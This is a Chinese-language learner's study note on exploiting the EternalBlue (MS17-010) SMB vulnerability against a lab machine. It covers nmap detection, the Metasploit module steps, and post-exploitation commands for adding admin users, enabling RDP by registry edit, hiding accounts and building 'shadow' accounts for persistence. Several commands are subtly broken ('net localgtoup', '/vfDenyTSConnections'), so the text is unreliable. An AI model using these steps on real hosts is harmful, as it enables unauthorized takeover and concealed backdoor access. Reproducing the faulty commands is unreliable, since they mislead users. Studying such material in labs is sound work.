第三篇学习成果的自我总结:
写得不好或错误的,请指出来。心甘情愿的接受不好的一面
强调:发表的内容只能在靶机上进行。不能运用在别人的物理机上运行!不能运用在别人的物理机上运行!不能运用在别人的物理机上运行!攻击工具是kali
永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。
扫描目标主机是否存在该漏洞
nmap -sV -p445 --script=smb-vuln-ms17-010 192.168.20.142
-
-nmap :开源网络扫描工具,用于探测主机、端口、服务及漏洞
-
-sV :探测端口对应的服务版本,确认SMB协议具体版本(漏洞仅影响SMBv1)
-
-p445 :指定仅扫描445端口,SMB协议现代默认通信端口
-
--script=smb-vuln-ms17-010 :加载nmap专属漏洞检测脚本,专门验证MS17-010永恒之蓝漏洞是否存在
说明:进入msfconsole程序是最后出现msf6
第二步是search ms17-010 查找MS17-010模块
第三步:利用模块(use 0)
第四步:set rhosts 攻击的ip 建立目标主机
第五步:run发起攻击
监控目标主机run vnc
说明:ctrl + c是停止攻击
截取目标主机的屏幕界面,就是截屏:
写shell就能得到目标主机的命令提示窗口,出现乱码就输入chcp 65001
权限:
system:系统本身,最高权限
administrator:管理员用户
guest:客人,只能参观,没有管理
标准用户:没有管理权,相当于牛马
administrators:管理员组
查看用户:net user
删除用户:net user 用户名 /del
添加用户:net user 用户名 密码 /add
查看详细用户:net user 用户名
查看自己是谁:whoami
win+r:mstsc是打开远程桌面连接,远程登陆(rdp)
打开远程连接:reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfDenyTSConnections /t REG_DWORD /d 0 /f
将用户添加组:net localgtoup administrators(组名) 用户名 /add
在任务栏按搜索:输入uac是用户账户控制设置,从下往上是高到低等级,更改要重启才成功
查看组名:net localgtoup
删除组:net localgtoup 组名 /del
隐藏用户:net user 用户名$ 密码 /add 只是在net user里看不到
影子用户:一个用户的密码,另一个用户的权限。过程:将用的用户名与权限导出,还有 要用的权限导出来,权限里的内容是f的数据,替换就行了删了要用的用户